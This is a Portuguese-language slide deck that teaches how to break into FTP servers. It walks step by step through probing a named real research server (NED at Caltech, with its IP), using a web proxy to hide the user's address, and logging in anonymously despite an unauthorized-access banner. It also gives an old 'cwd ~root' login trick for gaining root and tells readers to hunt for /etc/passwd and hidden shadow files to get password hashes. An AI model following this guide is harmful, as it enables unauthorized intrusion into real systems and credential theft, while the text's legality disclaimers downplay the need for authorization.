Invasão de servidor ftp

2,923
-1

Published on

Invasão de redes de computadores

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,923
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
340
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Invasão de servidor ftp

  1. 1. CONTEUDO O que é FTP - Conceitos básicos - Cliente/Servidor - Porta padrão - Como conectar - Comandos - TraDução de nome de arquivos - Mensagens FTP Servidor alvo - Sobre o servidor que envia dados para NASA Visualizando o servidor FTP com proxy - Webexploiter - Como pegar o IP do servidor - Procurando portas abertas - Visualizando FTP de uma forma segura Visualizando os arquivos do FTP diretamente de seu computador - Como pegar o IP - Verificando se a porta 21 está aberta - Logando no servidor - Definindo um diretório local - Listando diretórios - Abrindo diretórios e listando arquivos - Procurando arquivos ocultos - Baixando arquivos do servidor - Enviando arquivo para o servidor - Visualizando o arquivo do Banner - Analisando os arquivos - Restrições Enviando comandos diretamente para o servidor - Entendendo os comandos - Logando no Sistema - Sistema operacional - Conexão de Dados - Comandos que utilizam conexão de dados FTP via TELNET - Conexão direta com o servidor - Conexão de rede via FTP - Como criar uma conexão de rede com o servidor FTP UNIX - Usuários - Navegação - Principais comandos UNIX - Modificando os permissões - Principais diretórios - Senhas e Exploits - Login anônimo - Logar como root - Diretório das senhas - Decriptografando uma senha - Quebrando uma senha - Exploits UNIX - BuG DE PHF - Principais Falhas de FTP
  2. 2. PREFÁCIOPREFÁCIOPREFÁCIOPREFÁCIO Atualmente invadir um servidor de FTP não é mais uma tarefa facio. Os sistemas operacionais, protocolos evoluíram, muitos bugs foram corrigidos. Mas ainda esta longe de ser perfeito, existem muitas falhas, formas de invasão. O que não existe mais são as formulas prontas do tipo “use este script que você esta dentro do servidor” Para você conseguir entrar em um servidor FTP, antes de tudo você precisa saber como ele funciona, quais as vulnerabilidades do servidor e de seu sistema operacional, conhecer a fundo o protocolo FTP, seus comandos, ou seja, é preciso realmente estudar. O propósito desta apostila é este, estudar o funcionamento e vulnerabilidades de um servidor FTP. Eu usei um servidor Americano que envia dados para NASA como exemplo, deixei tudo passo a passo como logar e navegar no servidor, porem quero deixar claro que não tem nada de ilegal, o servidor tem suas proteções como veremos mais adiante. Não estou promovendo nenhum tipo de crime virtual, usem isto para aumentar seu conhecimento em segurança, lembrando que se você mudar um byte de um servidor que você não tem autorização é crime. Rackerox rackerox@hotmail.com
  3. 3. O QUE É FTP FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma bastante rápida e versátil de transferir arquivos, sendo uma das mais usadas na internet. Um Website precisa de um servidor FTP para “guardar” seus arquivos. Quando você visita um site na internet, você esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu computador. Se você tiver acesso ao servidor FTP de um site, você terá acesso aos arquivos deste site, e mais se você estiver logado o FTP você poderá mudar os arquivos Primeiramente vamos entender alguns conceitos. Para existir uma comunicação entre computadores é necessário: -Um endereço de cada computador (IP) -Um linguagem que os dois computadores entendam ( protocolos) -Como são vários serviços ao mesmo tempo,exemplo chat ,site ,remote, etc...Cada serviço precisa ter uma porta especifica, caso contrario os dados de um serviço iriam ser recebidos por outros. Cliente / Servidor Sem complicar...o conceito é simples: Cliente é o seu programa de ftp que esta no seu computador. Servidor é o que está hospedado junto com o site. (você também pode criar um servidor em seu computador) O Servidor remoto aceita uma conexão de controle do cliente local. O cliente envia comandos para o servidor e a conexão persiste ao longo de toda a sessão (tratando-se assim de um protocolo que usa o TCP).O servidor cria uma conexão de dados para a transferência de dados, sendo criada uma conexão para cada arquivo transferido. Estes dados são transferidos do servidor para o cliente e vice e versa. Os comandos estão separados dos dados e o cliente pode enviar comandos durante a transferência de dados. O encerramento da conexão indica o fim do arquivo. Porta padrão A porta padrão para FTP é a porta 21 Como conectar Existem vários Programas de cliente FTP, mas eles apenas servem para manutenção de sites. O melhor programa mesmo são os clientes que não usam interface gráfica, eles funcionam com linha de comando, funcionam no MS-DOS ou no Prompt de Comando no windows. Vamos fazer um conexão com um servidor FTP usando o programa de FTP que existe no windows XP.Este programa não tem interface gráfica, ele roda no Prompt de comando. Para abrir o prompt de comando vá em executar e digite cmd. Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora você esta com o programa aberto, é preciso aprender os comandos. Comandos FTP Estes comandos funcionam com você logado no servidor.Você terá controle total sobre os arquivos hospedados.
  4. 4. COMANDO SINTAXE DESCRIÇÃO ! ! COMANDO Executa COMANDO na máquina local. No prompt do ftp, os comandos digitados são, a princípio, executados na máquina remota. Para executar um comando na máquina local preceda o mesmo com o ! ascii ascii Configura o tipo de transferência de arquivos para ASCII. É o valor padrão bell bell Emite um bip quando um comando é completado binary binary Configura o tipo de transferência de arquivos para binário. bye bye Encerra a sessão ftp e retorna ao interpretador de comandos cd cd DIRETÓRIO Muda o diretório de trabalho para DIRETÓRIO cdup cdup Muda para o diretório que está um nível acima do diretótio atual chmod chmod MODO ARQUIVO Altera as permissões de ARQUIVO de acordo com MODO. close close Encerra a sessão ftp e retorna ao interpretador de comandos delete delete ARQUIVO Apaga ARQUIVO dir dir DIRETÓRIO ARQUIVO-LOCAL Lista o conteúdo de DIRETÓRIO colocando o resultado em ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se DIRETÓRIO não for especificado, será listado o conteúdo do diretório atual. Se ARQUIVO-LOCAL não for especificado a listagem será enviada para a tela. get get ARQUIVO-REMOTO ARQUIVO- LOCAL Baixa ARQUIVO-REMOTO para sua máquina com o nome de ARQUIVO-LOCAL. Se ARQUIVO-LOCAL não for especificado o arquivo será baixado com o mesmo nome que tem na máquina remota. help help COMANDO Descreve sumariamente o COMANDO. Se este não for especificado será exibida a lista de todos os comandos. lcd lcd DIRETÓRIO Muda o diretório de trabalho na máquina local. ls ls DIRETÓRIO ARQUIVO-LOCAL Lista o conteúdo de DIRETÓRIO colocando o resultado em ARQUIVO-LOCAL, que é um arquivo na sua máquina. Se DIRETÓRIO não for especificado, será listado o conteúdo do diretório atual. Se ARQUIVO-LOCAL não for especificado a listagem será enviada para a tela. mdelete mdelete ARQUIVOS Apaga ARQUIVOS mdir mdir DIRETÓRIOS ARQUIVO- LOCAL Semelhante a dir, porém lista o conteúdo de vários diretórios mget mget ARQUIVOS Semelhante a get, porém baixa vários arquivos mkdir mkdir DIRETÓRIO Cria um diretório com o nome de DIRETÓRIO mls mls DIRETÓRIOS ARQUIVO- LOCAL Semelhante a ls, porém lista o conteúdo de vários diretórios mode mode MODO Configura o modo de transferência de arquivos para MODO. O modo padrão é "stream" modtime modtime ARQUIVO Exibe a hora da última modificação de ARQUIVO mput mput ARQUIVOS Semelhante a put, porém envia vários arquivos newer newer ARQUIVO-REMOTO ARQUIVO-LOCAL Substitui o ARQUIVO-LOCAL pelo ARQUIVO-REMOTO se a hora de modificação do ARQUIVO-REMOTO for mais recente nlist nlist DIRETÓRIOS ARQUIVO- LOCAL Semelhante a nls put put ARQUIVO-LOCAL ARQUIVO- REMOTO Envia ARQUIVO-LOCAL para o servidor ftp nomeando-o como ARQUIVO-REMOTO. Se ARQUIVO-REMOTO não for especificado o arquivo será enviado com o nome de ARQUIVO- LOCAL pwd pwd Exibe o caminho completo(PATH) do diretório atual quit quit Semelhante a bye recv recv ARQUIVO-REMOTO Semelhante a get
  5. 5. ARQUIVO-LOCAL reget reget ARQUIVO-REMOTO ARQUIVO-LOCAL Semelhante a get com a diferença que se ARQUIVO-LOCAL existe e é menor que ARQUIVO-REMOTO, reget considera que ARQUIVO-LOCAL é ARQUIVO-REMOTO parcialmente transferido e contiua a transferência do arquivo. Muito útil quando se baixa arquivos grandes. remotehelp rhelp remotehelp COMANDO rhelp COMANDO Semelhante a help, porém solicita ajuda ao servidor ftp remotestatus rstatus remotestatus ARQUIVO rstatus ARQUIVO Exibe a situação de ARQUIVO. Se ARQUIVO não for especificado, exibe a situação da máquina remota. rename rename NOME-ANTIGO NOME- NOVO Renomeia um arquivo rmdir rmdir DIRETÓRIO Apaga DIRETÓRIO send send ARQUIVO-LOCAL ARQUIVO- REMOTO Semelhante a put size size ARQUIVO Exibe o tamanho de ARQUIVO status status Exibe a situação atual do servidor ftp system system Exibe o tipo de sistema operacional da máquina remota type type TIPO Configura o tipo de transferência de arquivos para TIPO. O padrão é ASCII. Se TIPO não for especificado, será mostrada a configuração atual ? ? COMANDO Semelhante a help Tradução de nomes de arquivos A sintaxe dos nomes dos arquivos pode ser incompatível entre diferentes Sistemas Operacionais. O UNIX usa 128 caracteres, maiúsculas e minúsculas, enquanto que o DOS usa 8 + 3 caracteres e apenas maiúsculas. Certos nomes não podem ser usados em alguns sistemas. Devido a isto tudo o BSD ftp define regras para a tradução de nomes. Mensagens FTP O FTP permite dois modos de transferência de mensagens FTP: texto (com traduções apropriadas) ou binário (sem tradução). Cada mensagem do servidor inclui um identificador decimal de 3 dígitos (exemplo: 226 Transfer complete). Estas mensagens podem ser vistas ou não, usando para isso o modo verbose ou quiet, respectivamente.
  6. 6. SERVIDOR ALVO Antes de tudo quero deixar claro que isto não é uma invasão ilegal, o servidor possui suas proteções, mas adiante vocês vão perceber. Vamos ver passo a passo como chegar até os arquivos de dentro do servidor. Site alvo: http://ned.ipac.caltech.edu/ É uma base de dados do Governo Americano coordenada pelo Instituto de tecnologia da Califórnia que fornece dados físicos e bibliográficos (coordenadas, parâmetros astronômicos e posição num mapa estelar) para NASA. É um laboratório de dados extragalácticos.
  7. 7. Visualizando o servidor FTP com Proxy Agora vamos “exploitar” o site com um Exploiter on line: http://www.webexploiter.com 1º) Pegar o IP do site Abra o webexploiter e vai em ping, vamos pingar o servidor. Escolha a opção http delete o “www” e digite apenas: ned.ipac.caltech.edu como nesta imagem: Clique em “ping it” Pronto agora temos o IP do servidor: Observe que a resposta do Ping vem com o IP: 134.4.10.118 2º) Procurando Portas abertas no Servidor: Neste mesmo exploiter vamos fazer um scan de portas no IP que a gente pegou. Basta ir em PORT SCAN, selecionar todas as portas e colar o IP: Depois clique em SCAN Observe que o servidor responde nas portas 80 e 21
  8. 8. A porta 21 por padrão é a porta de FTP 3º) Visualizando o FTP de uma forma Segura: Agora sabendo que a porta 21 esta aberta, podemos conectar no FTP Este mesmo exploiter possibilita que você veja arquivos em FTPs que permitem login anônimo: Basta clicar em FTP > Visualize FTP (login anônimo) Colar o IP Clique em START Observe: Ai está os diretórios do FTP Você pode navegar e baixar o que você quiser, têm estudos de galáxias, dados do telescópio hubble. Como da para perceber é server UNIX. Os arquivos ai rodam no linux mas da para visualizar no windows sem problema. Arquivos “.gz” são arquivos compactados o Winzip e o Winrar descompacta no windows. Arquivos “.dat” é só renomear para “.txt” que você verá os dados. Apesar do FTP estar permitindo login anônimo a NASA não fez isto para todo mundo ficar mexendo, eles deixaram um banner dizendo que se você não tem autorização pra entrar no FTP é para desconectar: “If you are not authorized to access this system, disconnect now.” Procure na pasta “msgs” que você vai localizar o banner.txt
  9. 9. Vantagem de visializar FTP primeiro no Webexploiter. É mais prático e você protege seu IP do log do servidor. Observe que neste servidor da nasa os IPs de quem loga fica registrado, se você deletar algum arquivo, é crime. Eu não sei se este é o LOG deles, mas pode ter certeza que o servidor tem um. Quando você entra com o Webexploiter você conecta via Proxy. O seu IP passa a ser: 67.15.221.2 Olhe da onde é este IP: City: Houston State: TX Country: US Postal code: 77060 Area code: 281 Lá no Texas, bem longe da sua casa. Alem do FTP, o Ping e o Port Scan não partem de seu computador. Da para você vasculhar o servidor no anonimato. Mas ele é apenas um Scan, não é um site de invasão, depois de scanear se você quiser invadir pra valer ai é outra historia.
  10. 10. Visualizando os arquivos do FTP diretamente de seu computador Eu não vou colocar senhas do site, existem muitos meios de quebrar uma senha de FTP, vou deixar apenas um login de UNIX que funciona, mas tem permissão restrita. A gente já tem todos os dados necessários, mas vou fazer tudo dinovo passo a passo pelo Prompt de Comando. 1º) Pegar o IP com o Ping ping ned.ipac.caltech.edu 2º) Verificar se a porta 21 (FTP) está aberta. Vamos usar o Telnet (no Ruindows XP, o vista não tem) Digite: telnet o 134.4.10.118 21 Você vai verificar que existe conexão e que agora as coisas ficam um pouco mais sérias, olhe a mensagem: Digite quit duas vazes e saia do telnet 4º) Logando no FTP Agora sabendo que a porta de FTP esta aberta, vamos entrar no programa de FTP do Ruindows. Basta digitar FTP e dar enter -agora vamos logar, digite: o 134.4.10.118 Note que o servidor manda uma mensagem dizendo que o computador pertence ao Governo Americano, é operado pelo instituto de tecnologia da califórnia e se você não tem autorização para estar ali é para desconectar agora. E depois pede o usuário
  11. 11. Aperte enter, vai dar falha de logon, mas tudo bem Agora digite: quote user ftp Observe, ele aceita este usuário e pede o Password Agora digite: quote pass ftp Olha que bunito xD, você esta dentro do servidor da NASA.
  12. 12. Definindo um diretório local Primeiramente teremos que definir um diretório local (em nosso computador) para o programa de FTP baixar e enviar os arquivos. -Crie uma pasta no seu desktop (eu criei a pasta “rox”) Agora vamos definir este diretório como diretório local. Use o comando lcd Agora digite lcd Desktop lcd rox Pronto agora nossa pasta de trabalho é a pasta “rox” Listando Diretorios Primeiro vamos usar o comando dir Apesar de ser um servidor UNIX o dir vai funcionar porque é um comando de seu programa de FTP do windows. Agora temos a lista dos diretórios do servidor. bin dev etc msgs pub usr Também podemos usar o comando ls
  13. 13. Abrindo diretórios e listando arquivos Para abrir um diretório vamos usar o comando cd Exemplo: vamos abrir o diretório “pub” O comando será: cd pub Observe que aparece a lista de todos os arquivos e diretórios que contem no diretório “pub” Para voltarmos um diretório acima vamos usar o comando c .. Não é c.. como no DOS, é c .. “C(espaço)..” Digite c .. e depois ls Observe que agora voltamos para o diretório anterior. Procurando arquivos ocultos O legal de usar comandos ao invés de programas prontos são as opções que você tem de manipular um arquivo ou diretório, este é um exemplo. Este servidor é UNIX, em UNIX qualquer arquivo que começa com um “.” (ponto) É um arquivo oculto. Este arquivo é invisível a primeira vista. E se esta oculto deve ser por algum motivo.
  14. 14. Vamos analisar o diretório “pub” novamente. cd pub ls Agora digite o comando ls –la Observe a diferença na lista de arquivos Baixando arquivos do servidor Já que estamos no diretório “pub” vamos baixar um arquivo deste diretório. Primeiro vamos conferir nosso diretório local: comando lcd Agora vamos usar o comando get para baixar o arquivo. Importante: não aparecerá nenhuma caixa de download e nenhuma barra de tempo. Dependendo do tamanho do arquivo, vai demorar para baixar. Vamos baixar o arquivo lisa.txt Basta digitar: get lisa.txt Espere um pouco e abra a pasta “rox” que você criou no desktop. Vamos baixar um arquivo oculto, o .dat.gz get .dat.gz Você pode baixar todos os arquivos que você conseguir listar. Se quando você ler esta apostila os arquivos “lisa.txt e “.dat.gz” não mais existirem tente baixar outros.
  15. 15. Olhe os arquivos que nos baixamos do servidor na pasta “rox” Enviando arquivo para o servidor O comando para enviar um arquivo é o comando put Vamos tentar enviar um arquivo para o diretório pub Coloque qualquer arquivo no diretório local (no nosso caso a pasta “rox”) Vou colocar um arquivo qualquer.. . Lamer_list.doc É um arquivo do Word Agora vamos tentar enviar este arquivo para o servidor, basta digitar: put Lamer_list.doc Observe: O servidor não aceitou, isto significa que o nível do seu usuário não permite “UPAR” nada para aquele diretório. Tente em outro diretório, mas acredito que com logim anônimo você não vai conseguir. Só com outro login.
  16. 16. Visualizando o arquivo do Banner Lembra da mensagem do servidor? Esta aqui: Vamos traduzir: *------------------------------------------------------------------------ * Este computador é financiado pelo Governo dos Estados Unidos * E operado pelo California Institute of Technology * De apoio ao curso U.S. Government programas e atividades. * Ao continuar, você concorda com os dados que voce digitar * Sendo monitorado. Os usuários deste sistema não têm nenhuma expectativa de * Privacidade. * Se você não está autorizado a acessar a este sistema, desconecte agora. *------------------------------------------------------------------------ Vamos achar o arquivo desta mensagem. É um arquivo de texto. Volte para o inicio cd .. Agora liste ls Entre no diretório msgs cd msgs liste este diretório ls Observe na imagem o arquivo banner.txt Agora vamos baixar este arquivo get banner.txt
  17. 17. Agora observe nossa pasta “rox” Abra o arquivo banner.txt Surpresa: Você deve estar pensando: Então eu vou deletar este arquivo no servidor e colocar outro com minha mensagem no lugar dele. Isto é o famoso Banner Grabbing. O comando para deletar é o del E o comando para enviar arquivo é o put Mas as coisas não são tão simples assim, você esta logado como anônimo e sua permissão neste diretório é este. drwxr-xr-x você esta no terceiro grupo “xr-“ Ai não tem nenhum “w” significa que você só pode ler o arquivo e não pode gravar nada. Com login anônimo sem chance, você terá que pegar alguma senha e logar. Tem mais arquivos de banner ai, baixe eles e olhe. Analisando os arquivos Eu analisei os arquivos do servidor e não achei nada de interessante. Só tem dados de satélite, telescópio estudos de física. Se fosse na guerra fria até dava para vender para União Soviética rsrs. Mas da para estudar e estrutura de diretórios e arquivos UNIX Olhem as extensões que mais aparecem.
  18. 18. .dat dat é uma abreviação de data (dados), este arquivo contem dados, neste caso dados de telescópio, satélite,sei la. Eu renomei um deles para .txt , tinha isto: File Name: .dat, Processing Time: Thu Feb 8 04:30:00 Output option: compact_2 ************************** SEARCH REQUESTS ****************************** IN_CSYS : equatorial , IN_EQUINOX : J2000.0 OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0 EXTENDED_NAME_SEARCH: Yes SORTED_BY_FIELD : Distance_to_search_center REDSHIFT_VELOCITY : 10000.0 DEFAULT_RADIUS : 1.000000 DEFAULT_BEGIN_YEAR : 1900 DEFAULT_END_YEAR : 2006 IAU NAME STYLE : S NEARPOSN: 1.4514872000d ; 54.55719600 ; 1.00 Much care has gone into the collection of POSITIONS and VELOCITIES in NED, and they are carried along with uncertainties and references to their origin. These are continually over-written by more accurate values as they become available. The other "Basic Data", however -- diameters, magnitudes, flux densities, cluster populations, etc -- are indicative values only, in the sense that they originate in many different sources, and have not been placed on a uniform scale. The main sources are catalogs and compilations, with the more accurate data sets favored, and the larger ones favored at comparable accuracy. No information is kept about the origin of "Basic Data". More controlled and rigorous data collection is applied to PHOTOMETRIC DATA, POSITION DATA, and REDSHIFT DATA. These measurements are carried along with their uncertainties, references to their origin, and some information about the data collection and processing behind them. Unlike basic data, PHOTOMETRIC, POSITION, and REDSHIFT DATA are never erased or updated, but should serve as a cumulative record of the measurements on each object. As a future enhancement to NED, additional data frames along the same lines will be introduced for kinematics, classifications, and other parameters. A. Galaxies (G) Field 1: Morphology Field 2: A magnitude in the visible range, on any scale as available Field 3: Major axis diameter in arcmin Field 4: Minor axis diameter in arcmin .gz (arquivo compactado, o winzip do windows consegue descompactar) .txt (arquivo de texto ...) .c (são scripts, muito interessante) Restrições Quando logamos apareceu a mensagem: (restrições aplicadas) E quando digitamos dir apareceu isto.
  19. 19. d x w são códigos de permissão para cada diretório, mas adiante eu explicarei o que significa cada código. Isto significa que não temos acesso a tudo dentro do servidor, agora você percebeu que entrar anônimo, não significa burlar uma senha, mas sim entrar como um usuário com um nível baixo e cheio de restrições. Mas, uma vês lá dentro, você pode procurar por arquivos e dados que te levam a senha do root ou à outros usuários. ENVIANDO COMANDOS DIRETAMENTE PARA O SERVIDOR Até agora fizemos um monte de comando, testes e tudo mais. Você deve estar se perguntando: Mas eu já enviei um monte de comandos? Sim, você enviou, mas não diretamente, você usou o programa cliente de ftp. Existe uma diferença em usar um programa de FTP e enviar comandos diretamente para o servidor. O programa de FTP do windows ou do Linux apenas interpreta estes comandos padronizados para FTP e envia para o servidor.Enviar um comando diretamente para o servidor é diferente. Vamos ver na pratica: Digite help Você vai visualizar o help do seu programa de FTP e todos os comandos que o seu programa de FTP interpreta. No nosso caso nosso servidor é um UNIX e ele interpreta mais comandos do que apenas estes de nosso programa de FTP. O programa de FTP do windows tem uma espécie de “filtro” que envia uma linha de comando diretamente para o servidor, este “filtro” é o comando quote ou o comando literal Agora digite quote help Observe que aparece um monte de comandos diferentes que o servidor interpreta, mas estes comandos não são interpretados pelo seu programa de FTP. IMAGEM Existe Duas formas de enviar um comando diretamente para o servidor: usando o comando quote ou conectando via telnet. Vamos usar o programa de FTP mesmo ENTENDENDO OS COMANDOS O protocolo FTP se baseia em comandos e respostas. Para enviar um comando basta enviar um texto pela conexão de controle (no nosso caso o nosso computador) seguido por uma nova linha (“Line Feed” ASCII 10 - 0x0A) Após o “Line Feed ASCII 10 - 0x0A” o servidor executará o comando e dará uma resposta. Formato da resposta: 220<ASCII 32 - 0x20>Resposta do Servidor<ASCII 10 - 0x0A> 220 (código de retorno) ASCII 32 - 0x20 (espaço em branco) ASCII 10 - 0x0A (uma linha nova) Se a resposta ocupar mais de uma linha o formato seguira o mesmo padrão. 220-<Espaço>Resposta (Linha 1)<LineFeed> 220-<Espaço>Resposta (Linha 2)<LineFeed> Neste formato, todas as linhas, com exceção da última, possuem um hífen (ASCII 45 - 0x2D) imediatamente após o código de retorno, exceto a última, que não possui hífen justamente para sinalizar que é a última linha da resposta. Então enquanto não aparecer o hífen deve-se aguardar o termino da resposta
  20. 20. LOGANDO no SISTEMA Os comandos são simples user (para usuário) e (pass para senha) Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos diretamente para o servidor utilizando o comando quote quote user seuusuario quote pass suasenha Se você não souber nenhuma senha tente anônimo quote user anonymous quote pass rackerox@ned.ipac.... Você também pode tentar explorar uma falha antiga, mas só funciona com servidores antigos.quando aparecer para logar digite isto: quote user ftp depois quote cwd ~root ou quote cwd~sys quote cwd~sysop depois quote pass ftp O comando cwd (Change Working Directory) é usado orinalmente para abrir um diretório, neste caso ele iria abrir ~root ,se isto acontecer Voce estará com privilégios root, você pode fazer o que quiser no servidor, terá permissão para tudo, inclusive para ser preso =) SISTEMA OPERACIONAL Agora que já estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar o comando syst , como é um comando direto vamos usar quote syst Agora sabemos que é UNIX CONEXÃO DE DADOS Existem comandos que precisam de uma conexão de dados estabelecida, por exemplo, se for baixar algum arquivo do servidor é necessário estabelecer portas do computador para isto. O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando direto ao servidor teremos que estabelecer quais serão as portas que iremos usar. Vamos usar o comando port O “port” indica ao servidor quais portas serão usadas na conexão Neste comando, deve-se passar 6 valores separados pro vírgula. Os 4 primeiros são os dígitos do IP. Os outros dois valores representam a porta TCP em que será feita a conexão.para definir a porta é um pouquinho complicado, você terá que separar os dois bytes que compõem o valor da porta e convertê-los para decimal.Exemplo: Xxxxx Exemplo do comando port Você também pode deixar o servidor especificar qual porta será utilizada, eu acho bem melhor, ai você não corre o risco de especificar uma porta que já esta sendo utilizada.Para isto use o comando pasv
  21. 21. Os bytes retornados nos parênteses são: os quatros primeiros são o IP, os outros dois são a porta. Para obter o número da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo. Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201). PRINCIPAIS COMANDOS que utilizam Conexão de Dados quote list (lista os arquivos do diretório atual no servidor) quote stor (Envia um arquivo para o servidor) quote retr (Faz o download de um arquivo do servidor) HELP Cuidado para não se confundir com o help, este comando lista todos os comandos do servidor, mas se você digita apenas help você terá os comandos do seu programa de FTP, para ver os comandos do servidor digite quote help Comando help (help do programa de FTP) Comando quote help (help do servidor)
  22. 22. FTP via TELNETFTP via TELNETFTP via TELNETFTP via TELNET Também podemos conectar um cliente Telnet na porta do FTP. Primeiro vamos abrir nosso cliente Telnet, abra o prompt de comando novamente e digite telnet (isto no windows XP, no vista você terá que baixar um cliente) Depois que você apertar enter abrira o cliente de telnet do Windows. Agora vamos abrir uma conexão com o servidor. Vamos usar o comando open : open ipdoservidor portadeconexao Exemplo: vamos abrir uma conexão com o IP 134.4.10.118 na porta 21 Lembrando que a porta padrão para FTP é a porta 21. O comando fica assim: open 134.4.10.118 21 depois de conectado vamos logar no servidor, usando comando user Se voce souber algum user e senha logue com ele, se não tente logar anônino User anonymous Se o servidor aceitar ele vai pedir para você completar com o passwd ou seu email, agora você usa o comando pass Mas no servidor não existe passwd para anonymous então você pode inventar um endereço de email usando o domínio do servidor. Resumindo: user anonymous pass rackerox@ipac.caltech.edu Depois só voce apertar enter que você estará logado, observe a imagem. Agora digite help Vai aparecer uma lista de comandos. Esta lista de comandos não é do seu cliente de telnet, mas sim do servidor que você esta acessando.
  23. 23. Observe que tem a assinatura do root: root@rad.ipac.caltech.edu Via telnet você terá uma conexão direta com o servidor, isto significa que você não precisa mais do quote, e também que aqueles comandos do programa de FTP não funcionará aqui. Aqui só vão funcionar os comandos do servidor. Para encerrar a conexão, basta digitar quit
  24. 24. Conexão de rede via FTPConexão de rede via FTPConexão de rede via FTPConexão de rede via FTP Podemos visualizar e manipular arquivos de um servidor FTP dentro do windows como se o arquivo estivesse no nosso computador. Observe a imagem, aparece as pastas no explorer, você pode copiar, colar, recortar... Para criar a conexão: - Clique em Iniciar > Configurações > Painel de Controle > Conexões de Rede. - Em outros locais (coluna à esquerda) entre em Meus Locais de Rede - Depois clique em Adicionar local de Rede - Agora é só ir seguindo as etapas. - Coloque o IP ou o endereço do servidor de FTP A vantagem de usar FTP desta forma é que fica bem mais simples e intuitivo. Mas a grande Desvantagem é que você não terá as varias opções de comandos que existe no prompt, você está limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, você nem saberá.
  25. 25. FTP UNIX A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX. Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP USUÁRIOS Root = super usuário ( poder realizar todas as funções sem restrição ) Cada usuário é classificado com um número, de 0 a FFFF-1 (65534). O numero 0 é designado para o Root e o 65534 para Ananymous De 0 a 100 são de superusuários (bin, adm, user, admin, guest, etc), se o servidor for pequeno o root e estes outros superusários são a mesma pessoa. NAVEGAÇÃO Importante em Unix os comandos são Case Sensitive ( diferencia letras maiúsculas e minúsculas ao contrario do MS-DOS) O Unix usa arvore de diretórios igual ao DOS mas a barra é invertida, ( utilize / ao invés de ) ls (mostras os diretórios e arquivos, o ls equivale ao DIR /W) ls –a (mostras arquivos ocultos) ls –la (mostras arquivos ocultos com detalhes) ls –l (mostra as permissões) exemplo: drw-r--r-- root root 10000 1 de abril etc d - directory r - read - so pode ver, dar download, etc... w - write - pode editar, gravar... x - execute - eh um executavel ou um script (tipo .BAT do DOS) Primeiro espaço: mostra se é um diretório ou não. Próximos 3 espaços: o que o proprietário pode fazer com o arquivo Próximos 3 espaços: são do GROUP que pertence o arquivo Últimos 3 espaços: são do USER (o que qualquer usuário pode fazer) Os últimos números são bytes ocupados.
  26. 26. PRINCIPAIS COMANDOS cd nomedodiretorio (para mudar de diretório) cd .. (para voltar um diretório) pwd (para ver em que diretório você esta) mkdir nomedodiretorio (para criar um diretório) rm arquivo (remover um arquivo, irá pedir confirmação y ou n ) cp arquivooriginal novalocalizaçao (copiar um arquivo) cat (mostra o conteúdo de um arquivo equivale ao type do DOS) who ( mostra quem está conectado no server, para mandar uma mensagem utilize write nomedouser) get nomedoarquivo (faz download do arquivo) cc arquivo (compila um arquivo) gcc arquivo monedoprograma ( compila um arquivo como o cc) MODIFICANDO AS PERMISSÕES chmod muda as permissões, exemplo: ls -l teste.txt -rw-r--r-- LoKi LoKi 34 teste.txt chmod g+w teste.txt ---> muda o acesso do Group para +write ls -l teste.txt -rw-rw-r-- LoKi LoKi 34 teste.txt chmod a-r teste.txt ---> muda o acesso de All para -read ls -l teste.txt --w--w---- LoKi LoKi 34 teste.txt chmod u+w teste.txt ---> muda o acesso de User para +write ls -l teste.txt --w--w--w- LoKi LoKi 34 teste.txt resumindo: o - para Owner g - para o Grupo u - para todos Usuários Importante: somente o root ou o proprietário pode usar o chmod.
  27. 27. Mais comandos chown, muda o OWNER (proprietário) de algum arquivo, isso se você for o OWNER atual. Use chown novodono nomedoarquivo chgrp, muda o grupo a que pertence o arquivo. Use chgrp novogrupo nomedoarquivo PRICIPAIS DIRETORIOS /etc/passwd Neste diretório estão contidos: Usuários, Senhas , Ids Abra o arquivo passwd, dependendo da sua permissão aparecera: root:*:0:1:system PRIVILEGED account:/:/bin/sh anonymous:*Nologin:65534:65534:anonymous NFS user:/: ou zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh (username:Password:id:uid:mini descrição:diretório de trabalho:'command.com') Se você conseguir abrir o arquivo passwd você verá que o anonymous não tem senha (por isso você pode logar anônimo com qualquer password) Se você perceber algum outro user UNPASSWORDED (sem senha) e com o ID melhor que o seu, entre logado com ele. Mas se a senha esta ai, porque não entrar com ela agora? Respostas, as senhas estão criptografadas, mas adiante veremos como decriptografar. Talves quando você abra o arquivo passwd pode aparecer isto: root:*:0:1:system PRIVILEGED account:/:/bin/sh anonymous:*Nologin:65534:65534:anonymous NFS user:/: nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/: daemon:*:1:1:system background account:/: bin:*:3:4:system librarian account:/bin: uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh ftp::12:15:Anonymous FTP:/tmp:/bin/sh Observe que no lugar das senhas dos usuários aparece um asterisco “*” , isto significa que as senhas estão em um outro lugar. Normalmente em /etc/shadow, e as vezes ela esta -r (No read) para os Users normais. Agora é hora de trabalhar, se as senhas estão (no read) teremos que achar uma forma de vê-las. O senha do root aparece com um asterisco por causa do shadow mas o shadow esta “r” para você. Normalmente /etc/shadow está escondido como /etc/.shadow Diretórios que começam com ponto “.” São diretórios ocultos. Se o .shadow não estiver na diretório etc, você precisa procurar e o arquivo passwd pode estar com outro nome. /etc/shadow/etc/shadow/etc/shadow/etc/shadow podem conter senhas como vimos anteriormente /etc/group/etc/group/etc/group/etc/group Aqui fica guardado quem pertence a cada grupo e as senhas do grupo.
